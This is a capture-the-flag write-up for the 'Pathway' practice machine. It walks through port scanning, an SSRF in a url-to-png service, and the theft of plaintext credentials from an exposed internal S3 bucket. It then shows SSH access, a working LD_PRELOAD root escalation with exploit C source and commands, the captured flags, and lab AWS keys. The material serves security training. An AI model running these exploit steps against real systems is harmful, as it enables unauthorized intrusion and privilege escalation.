Pathway
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.210.230 --open
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-04 19:50 UTC
Nmap scan report for 192.168.210.230
Host is up, received echo-reply ttl 61 (0.15s latency).
Scanned at 2025-11-04 19:50:43 UTC for 152s
Not shown: 65520 closed tcp ports (reset), 11 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 fc:72:06:8f:ef:ec:9b:87:f3:95:ca:f2:e7:1f:ea:dc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFyksaWzSNfPbN6T3ts7+fGJ0/9aIXrN7HimSzjO+W6pfa1Qq4QZb/hnkglJwvjgcTOQiraq2M9EQ9JtbRC1ROY=
| 256 42:c2:f0:fd:85:f6:93:cb:bd:a0:e8:ed:c1:a2:6d:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHbDRRUQ2YifMbadcFEg6fdgQ2bcGEHcQyrud/UFwLiy
80/tcp open http syn-ack ttl 61 nginx 1.22.1
|_http-title: Chain App Dev
|_http-server-header: nginx/1.22.1
| http-methods:
|_ Supported Methods: GET HEAD POST
3089/tcp open ptk-alink? syn-ack ttl 61
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessio
nReq, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest:
| HTTP/1.1 400 Bad Request
| content-type: text/plain; charset=UTF-8
| Date: Tue, 04 Nov 2025 19:51:22 GMT
| Connection: close
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
| content-type: text/plain; charset=UTF-8
| Date: Tue, 04 Nov 2025 19:51:18 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| content-type: text/plain; charset=UTF-8
| Date: Tue, 04 Nov 2025 19:51:19 GMT
|_ Connection: close
4566/tcp open http syn-ack ttl 60 TwistedWeb httpd 24.3.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: TwistedWeb/24.3.0|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
<snipped>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>We have ssh open on port 22, http on port 80, and other two open ports.
SSH (20):
Since we do not have set of credentials, we will skip interacting with ssh at the moment.
HTTP (80):
On port 80, only a static page without any further functioanlities.
? (3089):
It asks for the url parameter, lets set it and put any value to see how we can paly with this.
Here we identified SSRF vulnerability.
Check also with other scheme like file:// to see if we can access the internal files:
There is a real vulnerability in an application called url to png which likely the one we have here.
I stopped enumerating this port because I did not find anything useful.
? (4566):
Just a blank page.
If we directory busted this:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ gobuster dir -u http://192.168.210.230:4566/ -w /usr/share/wordlists/dirb/common.txt -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.210.230:4566/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/internal (Status: 200) [Size: 626]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
===============================================================Lets navigate to that directory:
Here we have an internal bucket named internal, and one key object in it called users.json.
Get into that:
We will have set of credentials for two users.
See if those are valid:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ nxc ssh 192.168.210.230 -u brian -p T@k9B#LmX2^VzJ6p
SSH 192.168.210.230 22 192.168.210.230 [*] SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u5
SSH 192.168.210.230 22 192.168.210.230 [+] brian:T@k9B#LmX2^VzJ6p Linux - Shell access!
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ nxc ssh 192.168.210.230 -u huzaid -p 'M4&dX-Yq7Nz#5RbC'
SSH 192.168.210.230 22 192.168.210.230 [*] SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u5
SSH 192.168.210.230 22 192.168.210.230 [+] huzaid:M4&dX-Yq7Nz#5RbC Linux - Shell access!Both are valid.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ ssh brian@192.168.210.230
The authenticity of host '192.168.210.230 (192.168.210.230)' can't be established.
ED25519 key fingerprint is SHA256:DklQpxrLtoaufgj7p+2aDA6cAHCcLgqzj6qfqHm1nHw.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:30: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.210.230' (ED25519) to the list of known hosts.
brian@192.168.210.230's password:
Linux pathway 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
brian@pathway:~$Post-Exploitation:
The first local enumeration we can do, is to check what we can run with sudo:
brian@pathway:~$ sudo -l
Matching Defaults entries for brian on pathway:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty, env_keep+=LD_PRELOAD
User brian may run the following commands on pathway:
(ALL) NOPASSWD: /usr/bin/pingWe will see LD_PRELOAD is preserved by sudo due to env_keep misconfiguration, allowing library injection into privileged processes.
First we will create a shared object then assign it to the env_keep variable:
brian@pathway:~$ cat exploit.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
brian@pathway:~$ gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
exploit.c: In function ‘_init’:
exploit.c:7:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
7 | setgid(0);
| ^~~~~~
exploit.c:8:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
8 | setuid(0);
| ^~~~~~
brian@pathway:~$ ls
exploit.c exploit.so local.txtNow we can use this to get root access:
brian@pathway:~$ sudo LD_PRELOAD=/home/brian/exploit.so /usr/bin/ping
root@pathway:/home/brian#Get the flags:
root@pathway:/home/brian# cat local.txt
f28dc69735cf0340918ca803f67a29b0
root@pathway:/home/brian# cat /root/proof.txt
893abbf5118bc8e3865b742a46fe72d0After I solved the box, I found this was not the intended way to get intial access.
We should read a file called .env under url-to-png-2.0.2 directory to get credentials for aws access:
Pull the access key id and secret access key from the image so we can interact with aws services if we have permissions:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws configure --profile=Pathway
AWS Access Key ID [None]: AKIA7826a5d1963a4e6b
AWS Secret Access Key [None]: jIOzrNK0FXBeafVXQvXqDh1pS8frf0QqIS3BsN1OjAI
Default region name [None]: us-east-1
Default output format [None]: jsonWithin aws cli we can view who we are using this subcommand sts get-caller-identity:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws sts get-caller-identity --profile Pathway --endpoint-url http://192.168.210.230:4566
{
"UserId": "AKIAIOSFODNN7EXAMPLE",
"Account": "000000000000",
"Arn": "arn:aws:iam::000000000000:root"
}We are an iam user called root in that aws account.
Now lets view the bucket named internal:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws s3 ls s3://internal --profile Pathway --endpoint-url http://192.168.210.230:4566
2025-11-04 19:54:28 15364 11-4-2025.fileetcpasswd.png
2025-11-04 20:06:12 447681 11-4-2025.fileetcpasswd_width-4000.png
2025-11-04 20:01:22 2747 11-4-2025.httplocalhost.png
2025-11-04 20:02:54 2221 11-4-2025.httplocalhost3089.png
2025-11-04 20:03:14 41904 11-4-2025.httplocalhost3089_width-4000.png
2025-11-04 20:02:50 762 11-4-2025.httplocalhost4566.png
2025-11-04 20:02:46 2747 11-4-2025.httplocalhost80.png
2025-11-04 19:55:12 836872 11-4-2025.view-sourcefile_width-4000.png
2025-11-04 19:54:56 16083 11-4-2025.view-sourcefileetcpasswd.png
2025-11-04 19:55:33 470414 11-4-2025.view-sourcefileetcpasswd_width-4000.png
2025-11-04 19:55:58 70017 11-4-2025.view-sourcefilehomehuzaidawscredentials_width-4000.png
2025-11-04 20:26:06 732792 11-4-2025.view-sourcefileopturl-to-png-202env_width-4000.png
2025-11-04 19:56:38 21703 11-4-2025.view-sourcefileprocselfenviron_width-4000.png
2025-11-04 19:51:54 381 users.jsonIt contains a bunch of images, but what we are most interested in is that users.json file we saw earlier.
We can copy it to our machine using cp:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws s3 cp s3://internal/users.json . --profile Pathway --endpoint-url http://192.168.210.230:4566
download: s3://internal/users.json to ./users.json
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ ls
nmap users.json
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ cat users.json
[
{
"full name": "Brian Stove",
"username": "brian",
"role": "IT admin",
"email": "alsina@mailtech.offsec",
"password": "T@k9B#LmX2^VzJ6p"
},
{
"full name": "Huzaid Doodo",
"username": "huzaid",
"role": "Helpdesk",
"email": "huzaid@mailtech.offsec",
"password": "M4&dX-Yq7Nz#5RbC"
}
]We will get the same result and we can continue from here what we did to elevate our privileges.
Last updated